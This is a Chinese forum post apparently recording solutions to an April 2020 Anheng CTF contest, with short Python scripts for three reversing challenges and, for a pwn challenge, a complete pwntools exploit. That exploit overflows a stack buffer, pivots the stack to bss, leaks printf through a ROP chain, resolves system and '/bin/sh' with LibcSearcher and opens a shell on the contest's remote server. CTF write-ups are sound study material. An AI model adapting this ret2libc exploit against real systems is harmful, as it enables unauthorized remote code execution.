Navigation

    喵了个咪乎
    • Register
    • Login
    • Search
    • Categories
    • Recent
    • Tags
    • Popular
    • Users
    • Groups

    0x02 - 2020安恒4月月赛记录

    学习打卡区
    1
    1
    6
    Loading More Posts
    • Oldest to Newest
    • Newest to Oldest
    • Most Votes
    Reply
    • Reply as topic
    Log in to reply
    This topic has been deleted. Only users with topic management privileges can see it.
    • B
      Bi0x last edited by Bi0x

      • 直接去博客看

      • Re简单是真滴简单,难是真滴难

      • 做一半睡着了

      Re - 入门reverse

      • 白给的题目,flag贴脸上
      str1 = "akhb~chdaZrdaZudqduvdZvvv|"
flag = ''
for i in str1:
    flag += chr((ord(i) - 1) ^ 6)
print flag
      • flag{daef_wef_reverse_sss}

      Re - encrypt3

      • 比较懒,没进行认真的分析,直接爆破出flag了
      enc1 = [38, 44, 33, 39, 59,
        35, 34, 115, 117, 114,
        113, 33, 36, 117, 118,
        119, 35, 120, 38, 114,
        117, 113, 38, 34, 113,
        114, 117, 114, 36, 112,
        115, 118, 121, 112, 35,
        37, 121, 61]

for i in range(128):
    flag = ''
    for j in enc1:
        flag += chr(j ^ i)
    if 'flag{' in flag:
        print flag
      • flag{cb3521ad567c8f251fb1252d03690ce9}

      Re - sm

      • 虽然知道是 sm 加密,猜测是 sm4,但是找了半天工具没找到

        • 然后就<del>睡着了</del>干别的去了

      • 结束后看一个师傅写有解密用的轮子

      • 通过程序猜测出 key 为 0x0123456789ABCDEFFEDCBA9876543210

        • 密文为 0xC079776677E5AC9931C567EB470645A7

      • 装完轮子尝试解密出 flag

      import pysm4

key = 0x0123456789ABCDEFFEDCBA9876543210
cipher = 0xC079776677E5AC9931C567EB470645A7
dec = pysm4.decrypt(cipher, key)
print hex(dec)[2:-1]
      • flag{d0389046c236e4c66bd787959f5c6e66}

      Pwn - echo server

      • 简单栈溢出,需要注意的就是要把栈指针劫持到 bss 段
      from pwn import *
from LibcSearcher import LibcSearcher
#io = process('./test')
io = remote('183.129.189.60', 10061)
elf = ELF('./test')

buf_len = 0x80
fakeebp = p64(elf.bss() + 0x500)

start_addr = 0x00000000004005C0
pop_rdi_addr = 0x0000000000400823
retn_addr = 0x0000000000400824

payload = '\0' * buf_len + fakeebp + p64(pop_rdi_addr) + \
    p64(elf.got['printf']) + p64(0x4006EE) + p64(start_addr)
io.sendline('2333')
io.sendline(payload)
io.recvuntil('hello ')

printf_libc_addr = u64(io.recv().ljust(8, '\x00'))
libc = LibcSearcher('printf', printf_libc_addr)
system_libc_addr = printf_libc_addr - libc.dump('printf') + libc.dump('system')
bin_sh_libc_addr = printf_libc_addr - libc.dump('printf') + libc.dump('str_bin_sh')
payload = '\0' * buf_len + fakeebp + p64(retn_addr) + p64(pop_rdi_addr) + p64(
    bin_sh_libc_addr) + p64(system_libc_addr) + p64(start_addr)

io.sendline('2333')
io.sendline(payload)
io.interactive()
      1 Reply Last reply Reply Quote 0
      • First post
        Last post